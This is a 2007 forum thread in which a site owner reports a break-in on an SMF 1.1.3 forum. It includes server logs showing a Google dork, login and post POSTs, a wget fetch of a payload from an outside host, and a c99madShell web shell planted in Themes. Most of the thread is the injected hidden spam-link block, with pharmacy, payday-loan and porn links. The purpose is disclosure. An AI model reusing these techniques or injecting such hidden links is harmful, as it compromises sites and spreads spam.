Advertisement:

Author Topic: Possible *major* SMF exploit in the wild, going back years!  (Read 42601 times)

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Possible *major* SMF exploit in the wild, going back years!
« on: September 29, 2007, 10:17:19 AM »
Check here...
http://www.devside.net/blog/smf-exploit-like-phpbb-hack [nofollow]

Then check your Apache error logs for any wget like blocks.

This particular break-in had the effect of causing the preview feature of SMF to get stuck on 'fetching preview...' unless JavaScript was turned off.

I see many others with similar problems and unexplained behavior in the forums, and the search turns up similar issues going back some time.

Offline karlbenson

  • SMF Friend
  • SMF Super Hero
  • *
  • Posts: 15,584
  • Gender: Male
    • @mortonssols on Twitter
    • Criminal Solicitors
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #1 on: September 29, 2007, 10:48:07 AM »
http://www.simplemachines.org/about/security.php
Please feel to report it via the security report form.

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #2 on: September 29, 2007, 01:17:16 PM »
Did that. Still, looking into it further, this is possibly done with simple POST data. Everyone is at risk.
This is how this attacker found me, from my logs...
Came from Google with search string "powered+by+smf+1.1.3". Check your logs.

Offline 青山 素子

  • Server Team
  • SMF Super Hero
  • *
  • Posts: 16,535
  • 戦場ヶ原、蕩れ!
    • motokochan on GitHub
    • @motokochan on Twitter
    • Animeneko Network
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #3 on: September 29, 2007, 01:48:26 PM »
Do you allow attachments? Are the attachments set to use an encrypted name? What platform is the server on?

There are many ways for the javascript that includes preview functionality to break, linking it exclusively to this problem is overreaching.
Motoko-chan
Director, Simple Machines

Just like... making of enemies / 負ける気しない やめるきない / You are cool but fool - Charisma.com 『HATE』

Note: I am not a member of the Simple Machines Forum project.


Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #4 on: September 29, 2007, 02:04:55 PM »
It's not overreaching at all, I've gone over the logs quite a bit. This attack was managed from two IPs. One to install it. Another to manage it.

The preview feature broke the same time as the hack. The attacking script probably edited something here and there.

c99madShell was installed as Themes\readme.php

I don't have any mods installed, this happened under SMF 1.1.3, and while the attachment option is there, I never set the upload dir or permissions...
"An Error Has Occurred!
Cannot access attachments upload path!"

Quote
83.219.135.75 - - [26/Sep/2007:09:48:07 -0400] "GET /index.php?action=register HTTP/1.1" 200 5961 "http://www.google.com/search?num=100&hl=en&lr=&as_qdr=all& [nofollow]
q=+%22powered+by+smf+1.1.3%22+site%3Anet&btnG=Search" "Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.8.1.7) Gecko/20070914 Firefox/2.0.0.7"
...GET junk...
83.219.135.75 - - [26/Sep/2007:09:57:07 -0400] "POST //index.php?action=login2 HTTP/1.1" 302 851 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:09 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 375 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:11 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 1527 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
83.219.135.75 - - [26/Sep/2007:09:57:23 -0400] "POST /index.php?action=post2; HTTP/1.1" 200 307 "-" "Mozilla/4.0 (compatible; Windows 5.1)"
...As you can see by the timeline, the last POST above did this...
Quote
--09:57:23--  http://kotzilla.jino-net.ru/include.txt [nofollow]
           => `include.txt'
Resolving kotzilla.jino-net.ru... 217.107.217.29
Connecting to kotzilla.jino-net.ru|217.107.217.29|:80... connected.
HTTP request sent, awaiting response... 200 OK
Length: 44,348 (43K) [text/plain]
 
    0K .......... .......... .......... .......... ...       100%   69.60 KB/s
 
09:57:25 (69.60 KB/s) - `include.txt' saved [44348/44348]

Quote
149.156.204.1 - - [26/Sep/2007:09:57:38 -0400] "GET /Themes/readme.php HTTP/1.1" 200 4374 "-" "Opera/9.21 (Windows NT 5.1; U; ru)"
149.156.204.1 - - [26/Sep/2007:09:58:00 -0400] "POST /Themes/readme.php HTTP/1.1" 200 3501 "http://forums.devside.net/Themes/readme.php [nofollow]" "Opera/9.21 (Windows NT 5.1; U; ru)"
...

Just trying to help others out, as this will happen to you tomorrow.
« Last Edit: September 29, 2007, 02:17:59 PM by be_cool »

Offline be_cool

  • Semi-Newbie
  • *
  • Posts: 11
Re: Possible *major* SMF exploit in the wild, going back years!
« Reply #5 on: September 29, 2007, 03:11:34 PM »
This just gets better and better. I'm not sure I caught this in time to not get banned in google, etc. Its only been a few days, but that is enough.

The reason for the 'fetching preview...' error, and probably the reason for all the other unexplained error msgs people are getting, is index.php is being modified with this...

Code: [Select]
<font style="position: absolute;overflow: hidden;height: 0;width: 0">
 board of pharmacy <a href="http://4homepages.de/forum/Themes/default/fonts/font/1/index.html">zambia debt help</a> vardenafil cheap<br>
 tadalafil pill <a href="http://4homepages.de/forum/Themes/default/fonts/font/2/index.html">debt solutions international business company</a> tadalafil 20mg<br>
 erectile dysfunction solutions <a href="http://4homepages.de/forum/Themes/default/fonts/font/3/index.html">debt consolidation loan uk ga</a> tadalafilo<br>
 sildenafil patent <a href="http://4homepages.de/forum/Themes/default/fonts/font/4/index.html">percentage of american in debt</a> prescription tadalafil<br>
 sildenafil citrate soft tabs <a href="http://4homepages.de/forum/Themes/default/fonts/font/5/index.html">debt to ratio income</a> apcalis tadalafil<br>
 buy sildenafil citrate <a href="http://4homepages.de/forum/Themes/default/fonts/font/6/index.html">buy cheap credit card debt</a> pfizer sildenafil<br>
 erectile dysfunction doctors <a href="http://4homepages.de/forum/Themes/default/fonts/font/7/index.html">charter communications debt</a> sildenafil contraindications<br>
 sildenafil and nitrates <a href="http://4homepages.de/forum/Themes/default/fonts/font/8/index.html">and debt mortgage table amortization calculator</a> cheap tadalafil<br>
 alcohol erectile dysfunction <a href="http://4homepages.de/forum/Themes/default/fonts/font/9/index.html">debt moratorium by hoover</a> tadalafil canada<br>
 discount pharmacy <a href="http://4homepages.de/forum/Themes/default/fonts/font/10/index.html">pay off your debt free help</a> 4<br>
 vardenafil hci <a href="http://4homepages.de/forum/Themes/default/fonts/font/11/index.html">debt and delusion</a> tadalafil ic 351<br>
 what is tadalafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/12/index.html">city kansas loan online payday</a> contains sildenafil<br>
 rx tadalafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/13/index.html">4 payday loan glendale 6</a> international pharmacy<br>
 efficacy of vardenafil <a href="http://4homepages.de/forum/Themes/default/fonts/font/14/index.html">instant payday loan painesdale michigan</a> is vardenafil<br>
 tadalafil on <a href="http://4homepages.de/forum/Themes/default/fonts/font/15/index.html">call fax loan no no payday</a> between sildenafil<br>
 vardenafil side effects <a href="http://4homepages.de/forum/Themes/default/fonts/font/16/index.html">payday loans without checks</a> vardenafil hcl 20mg tab<br>
 erectile dysfunction cause <a href="http://4homepages.de/forum/Themes/default/fonts/font/17/index.html">cash advance payday loan munster indiana</a> osco pharmacy<br>
 eli 20 tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/index.html">buy levitra</a> sildenafil forum<br>
 of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra31.html">buy levitra</a> sildenafil hypertension<br>
 rite aid pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra32.html">levitra</a> hypertension and sildenafil<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra33.html">discount levitra</a> rx pharmacy<br>
 erectile dysfunction remedy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra34.html">generic levitra</a> alcohol and erectile dysfunction<br>
 tadalafil vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra35.html">cheap levitra</a> pulmonary hypertension<br>
 coping with erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra36.html">levitra online</a> does vardenafil<br>
 generic tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra37.html">buy levitra online</a> tadalafil no<br>
 sildenafil dosage <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra38.html">levitra sales</a> side effects of<br>
 soft viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra39.html">order levitra</a> eckerds pharmacy<br>
 sildenafil sil den a fil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra310.html">levitra drug</a> california board of pharmacy<br>
 sildenafil citrate lowest prices <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra311.html">levitra price</a> sildenafil patent<br>
 pharmacy colleges <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra312.html">purchase levitra</a> tadalafil lowest price<br>
 mg tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra313.html">levitra prices</a> does vardenafil<br>
 apcalis tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra314.html">herbal levitra</a> sildenafil in pulmonary hypertension<br>
 chemical structure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra315.html">levitra pens</a> of vardenafil<br>
 sildenafil citrate without prescription <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra316.html">levitra no prescription</a> erectile dysfunction remedies<br>
 about erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/1/levitra317.html">kamagra</a> ranbaxy tadalafil<br>
 purchase sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/index.html">buy viagra</a> sildenafil citrate discount<br>
 low price viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra81.html">buy viagra</a> rite aid pharmacy<br>
 specialty pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra82.html">viagra</a> chemical structure<br>
 sildenafil and pulmonary hypertension <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra83.html">cheap viagra</a> liquid vardenafil<br>
 giant pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra84.html">viagra online</a> sodium citrate<br>
 sildenafil citrate soft tabs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra85.html">prescription viagra</a> and sildenafil and<br>
 pharmacy education <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra86.html">order viagra</a> sildenafil discount<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra87.html">buy viagra online</a> how sildenafil<br>
 united pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra88.html">purchase viagra</a> buy sildenafil citrate<br>
 sildenafil hypertension <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra89.html">discount viagra</a> tadalafil forum<br>
 sildenafil cancer <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra810.html">generic viagra</a> erectile dysfunction exercise<br>
 counter sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra811.html">overnight viagra</a> sildenafil for pulmonary<br>
 side effects of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra812.html">viagra drug</a> 50mg viagra<br>
 tadalafil work <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra813.html">purchase viagra online</a> hospital pharmacy<br>
 effects of sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra814.html">order viagra online</a> sildenafil oral<br>
 male sexual dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra815.html">viagra for sale</a> eckerds pharmacy<br>
 alcohol erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra816.html">cheap viagra online</a> alcohol erectile dysfunction<br>
 us pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra817.html">buy viagra cheap</a> pharmacy license<br>
 side effects of <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra818.html">blue pill</a> order tadalafil<br>
 tadalafil vs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra819.html">sildenafil citrate</a> sildenafil citrate canada<br>
 pharmacy salary <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra820.html">generic sildenafil</a> tadalafil ic 351<br>
 college of pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra821.html">buy sildenafil</a> vardenafil cost<br>
 order tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra822.html">sildenafil citrate tablets</a> sildenafil 50<br>
 pharmacy technician training <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra823.html">sildenafil online</a> herbal sildenafil<br>
 tadalafil with <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra824.html">cheap sildenafil</a> pharmacy programs<br>
 erectile dysfunction clinic <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra825.html">order sildenafil</a> tadalafil and nitrolingual<br>
 sildenafil citrate tablet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra826.html">sildenafil tablets</a> or sildenafil<br>
 cooper pharma sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra827.html">purchase sildenafil</a> pharmacy residency<br>
 does tadalafil work <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra828.html">erectile dysfunction drugs</a> sexual dysfunction<br>
 erectile dysfunction cures <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra829.html">erectile dysfunction medication</a> erectile dysfunction cause<br>
 publix pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra830.html">erectile dysfunction treatments</a> sildenafil canada<br>
 sildenafil 100 <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra831.html">erectile dysfunction drug</a> vardenafil hcl 20mg tab<br>
 tadalafil mexico <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/2/viagra832.html">erectile dysfunction device</a> sildenafil cancer<br>
 sildenafil vaginal <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/index.html">buy cialis</a> pharmacy software<br>
 tadalafil report <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis31.html">buy cialis</a> tadalafil pulmonary<br>
 sildenafil citrate 25mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis32.html">cialis</a> sildenafil canada<br>
 sildenafil blood pressure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis33.html">tadalafil</a> erectile dysfunction products<br>
 sildenafil citrate tablet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis34.html">generic tadalafil</a> mail order pharmacy<br>
 sildenafil treatment <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis35.html">buy tadalafil</a> sildenafil troche<br>
 tadalafil picture <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis36.html">cheap tadalafil</a> tadalafil<br>
 us pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis37.html">tadalafil 20mg</a> sildenafil citrate 100mg<br>
 vardenafil hcl 20mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis38.html">tadalafil online</a> contains sildenafil<br>
 erectile dysfunction forum <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis39.html">tadalafil soft tabs</a> sildenafil 100mg<br>
 is tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis310.html">tadalafil tablets</a> schools of pharmacy<br>
 erectile dysfunction com <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis311.html">discount tadalafil</a> tadalafil citrate<br>
 tadalafil lowest price <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis312.html">tadalafil softtabs</a> herbal sildenafil<br>
 efficacy of tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis313.html">order tadalafil</a> buy sildenafil citrate<br>
 elli lilly <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis314.html">cialis cheap</a> soft viagra<br>
 sildenafil sil den a fil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis315.html">cialis online</a> sildenafil 50mg<br>
 erectile dysfunction diet <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis316.html">prescription cialis</a> how to make sildenafil citrate<br>
 erectile dysfunction cure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis317.html">order cialis</a> pet pharmacy<br>
 make sildenafil citrate <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis318.html">buy cialis online</a> fake tadalafil<br>
 board of pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis319.html">purchase cialis</a> sildenafil pharmacology<br>
 erectile dysfunction com <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis320.html">discount cialis</a> tadalafil forum<br>
 pharmacy times <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis321.html">generic cialis</a> tadalafil pah<br>
 for vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis322.html">overnight cialis</a> tadalafil dosage<br>
 discount pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis323.html">cialis drug</a> sildenafil 20 mg<br>
 meijer pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis324.html">purchase cialis online</a> compounding pharmacy<br>
 tadalafil powder <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis325.html">order cialis online</a> sildenafil use<br>
 intravenous sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis326.html">cialis for sale</a> citrate de betaine<br>
 side effects <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis327.html">cheap cialis online</a> citrato de sildenafil<br>
 erectile dysfunction research <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/3/cialis328.html">buy cialis cheap</a> cheapest viagra<br>
 overnight viagra <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/index.html">buy soma</a> nitric oxide sildenafil<br>
 tadalafil citrate soft <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma31.html">buy soma</a> sildenafil and pulmonary hypertension<br>
 discount pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma32.html">soma</a> sildenafil citrate india<br>
 sildenafil 50mg <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma33.html">soma cheap</a> what is vardenafil<br>
 ajanta pharma <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma34.html">soma online</a> sildenafil citrate online<br>
 sildenafil citrate pills <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma35.html">prescription soma</a> erectile dysfunction natural cures<br>
 free sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma36.html">order soma</a> hypertension tadalafil<br>
 hydroxypropyl cellulose <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma37.html">buy soma online</a> pharmacy association<br>
 sams club pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma38.html">purchase soma</a> erectile dysfunction natural<br>
 www vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma39.html">discount soma</a> pharmacy program<br>
 pharmacy prices <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma310.html">generic soma</a> tadalafil forum<br>
 sildenafil contraindications <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma311.html">soma carisoprodol</a> on line pharmacy<br>
 sildenafil chemical structure <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma312.html">overnight soma</a> sildenafil 50mg<br>
 sildenafil soft tabs <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma313.html">soma drug</a> tadalafil review<br>
 tadalafil lowest price <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma314.html">purchase soma online</a> how sildenafil<br>
 erectile dysfunction medication <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma315.html">order soma online</a> erectile dysfunction help<br>
 non arteritic anterior ischemic optic neuropathy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma316.html">soma 350mg</a> sildenafil citrate pills<br>
 tadalafil side <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma317.html">soma for sale</a> ajanta pharma<br>
 pharmacy times <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma318.html">cheap soma online</a> alcohol and erectile dysfunction<br>
 osco pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/4/soma319.html">buy soma cheap</a> sildenafil citrate india<br>
 vardenafil side effects <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/index.html">male enhancement pill</a> sildenafil citrate side effects<br>
 buy tadalafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis51.html">male enhancement pill</a> cures for erectile dysfunction<br>
 muse erectile dysfunction <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis52.html">male enhancement</a> citric acid<br>
 kroger pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis53.html">growth penis</a> sildenafil pah<br>
 sildenafil cost <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis54.html">maxoderm endowmax</a> sildenafil citrate cheap<br>
 tadalafil 20 <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis55.html">penis enhancement</a> causes of erectile dysfunction<br>
 and vardenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis56.html">penis enlargement</a> clinical pharmacy<br>
 mexican pharmacy <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis57.html">penis growth</a> diabetes erectile dysfunction<br>
 natural sildenafil citrate <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis58.html">penis growths</a> sildenafil oral suspension<br>
 erectile dysfunction in men <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis59.html">penise enhancement</a> order tadalafil<br>
 containing sildenafil <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis510.html">penise enlargement</a> tadalafil from india<br>
 erectile dysfunction pump <a href="http://coppermine-gallery.net/forum/Themes/coppermine/css/5/penis511.html">penise growth</a> pre pharmacy<br>
 sildenafil pulmonary <a href="http://forum.cmsmadesimple.org/Packages/backups/css/1/index.html">cash advance payday loan santaquin utah</a> disfuncion erectil<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/2/index.html">payday cash loan grangeville idaho</a> sildenafil 1<br>
 tadalafil for sale <a href="http://forum.cmsmadesimple.org/Packages/backups/css/3/index.html">online no fax payday loan</a> mg tadalafil<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/4/index.html">can27t pay back payday loan</a> canada pharmacy<br>
 vardenafil hcl 20 <a href="http://forum.cmsmadesimple.org/Packages/backups/css/5/index.html">fairhope payday loan</a> erectile dysfunction forum<br>
 erectile dysfunction aids <a href="http://forum.cmsmadesimple.org/Packages/backups/css/6/index.html">payday loans new mexico</a> purchase viagra<br>
 intravenous sildenafil <a href="http://forum.cmsmadesimple.org/Packages/backups/css/7/index.html">4 kings mountain payday loan 6</a> how sildenafil<br>
 erectile dysfunction home remedies <a href="http://forum.cmsmadesimple.org/Packages/backups/css/8/index.html">no teletrack payday loan hallwood virginia</a> st louis college of pharmacy<br>
 direct pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/9/index.html">search loan till payday</a> contain sildenafil<br>
 vardenafil paradoxical <a href="http://forum.cmsmadesimple.org/Packages/backups/css/10/index.html">payday loan no fax no paper</a> erectile dysfunction ed<br>
 us pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/11/index.html">access cash loan payday money</a> sildenafil pphn<br>
 erectile dysfunction help <a href="http://forum.cmsmadesimple.org/Packages/backups/css/12/index.html">cash advance payday loan arvada colorado</a> counter sildenafil<br>
 sildenafil citrate 50 <a href="http://forum.cmsmadesimple.org/Packages/backups/css/13/index.html">cash til payday loan</a> albany college of pharmacy<br>
 vardenafil hci <a href="http://forum.cmsmadesimple.org/Packages/backups/css/14/index.html">advance cash payday sunday</a> sildenafil in infants<br>
 college of pharmacy <a href="http://forum.cmsmadesimple.org/Packages/backups/css/15/index.html">fast payday loan geigertown pennsylvania</a> pharmacy ce<br>
 tadalafil mastercard <a href="http://forum.cmsmadesimple.org/Packages/backups/css/16/index.html">payday advance loan umbarger texas</a> tadalafil compare<br>
 sildenafil and pulmonary <a href="http://forum.cmsmadesimple.org/Packages/backups/css/17/index.html">payday cash advance papalote texas</a> disfuncion erectil<br>
 sildenafil patent <a href="http://forum.cmsmadesimple.org/Packages/backups/css/18/index.html">payday loans league city tx</a> erectile dysfunction impotence<br>
 pharmacy ce <a href="http://forum.cmsmadesimple.org/Packages/backups/css/19/index.html">get cash until payday loan</a> sildenafil citrate online<br>
 liquid sildenafil <a href="http://forum.cmsmadesimple.org/Packages/backups/css/20/index.html">lendingtree for payday loans</a> vardenafil sildenafil<br>
 mg tadalafil <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/1/index.html">videos samples for i pod adult</a> erectile dysfunction commercials<br>
 pharmacy prices <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/2/index.html">3pg porn movies</a> cures for erectile dysfunction<br>
 side effects of <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/3/index.html">free manga movie porn sex</a> blood pressure erectile dysfunction<br>
 sildenafil structure <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/4/index.html">xxx porn squirting pussy</a> tadalafil overnight<br>
 tadalafil with <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/5/index.html">mature picture porn woman xxx</a> sildenafil over the counter<br>
 online pharmacy no prescription <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/6/index.html">adult movies downloads</a> effects of tadalafil<br>
 does viagra work <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/7/index.html">porn movie carnal desire cast</a> sildenafil citrate overnight<br>
 sildenafil treatment <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/8/index.html">home amateur porn movies</a> where to buy sildenafil<br>
 erectile dysfunction impotence <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/9/index.html">porn movie store</a> sildenafil dosage<br>
 erectile dysfunction exercises <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/10/index.html">free adult videos and pics ameture</a> vardenafil dosage<br>
 sams club pharmacy <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/11/index.html">free porn video no subscription</a> freedom pharmacy<br>
 st louis college of pharmacy <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/12/index.html">chart porn movies</a> sildenafil discount<br>
 for erectile dysfunction <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/13/index.html">amateur homemade xxx movies</a> arginine erectile dysfunction<br>
 erectile dysfunction com <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/14/index.html">free xxx adult download movies</a> or tadalafil<br>
 sildenafil soft tabs <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/15/index.html">share the load adult movies</a> penegra sildenafil citrate<br>
 sildenafil 100 <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/16/index.html">xxx movie deals</a> erectile dysfunction cures<br>
 sildenafil premature <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/17/index.html">rebcca adult movies</a> the pharmacy<br>
 unicure remedies sildenafil <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/18/index.html">free video streamed porn</a> schools of pharmacy<br>
 sildenafil citrate on line <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/19/index.html">uncle and niece xxx videos</a> buying viagra<br>
 cheap tadalafil no <a href="http://community.webassign.net/forum/Themes/EnglishSteel/css/20/index.html">free spanish porn video</a> purchase viagra online<br>
 erectile dysfunction medicine <a href="http://www.telaen.org/forum/Packages/backup/1/index.html">viagra online cheap</a> tadalafilo<br>
 erectile dysfunction cause <a href="http://www.telaen.org/forum/Packages/backup/2/index.html">viagra after a big meal</a> erectile dysfunction cures<br>
 sildenafil 50 mg <a href="http://www.telaen.org/forum/Packages/backup/3/index.html">how viagra works</a> sildenafil women<br>
 tadalafil no <a href="http://www.telaen.org/forum/Packages/backup/4/index.html">buying fake viagra</a> sildenafil citrate canada<br>
 or tadalafil <a href="http://www.telaen.org/forum/Packages/backup/5/index.html">viagra in woman</a> sildenafil forum<br>
 erectile dysfunction medications <a href="http://www.telaen.org/forum/Packages/backup/6/index.html">in use viagra woman</a> erectile disfunction<br>
 tadalafil pulmonary <a href="http://www.telaen.org/forum/Packages/backup/7/index.html">prednisone and cystitis</a> elephant pharmacy<br>
 drugs for erectile dysfunction <a href="http://www.telaen.org/forum/Packages/backup/8/index.html">prednisone and back pain</a> vardenafil side<br>
 tadalafil vs <a href="http://www.telaen.org/forum/Packages/backup/9/index.html">prednisone for rectal bleeding</a> sildenafil citrate powder<br>
 sildenafil overnight <a href="http://www.telaen.org/forum/Packages/backup/10/index.html">viagra cialis online</a> erectile dysfunction natural<br>
 on line pharmacy <a href="http://www.telaen.org/forum/Packages/backup/11/index.html">is cialis methodone</a> vardenafil tablets<br>
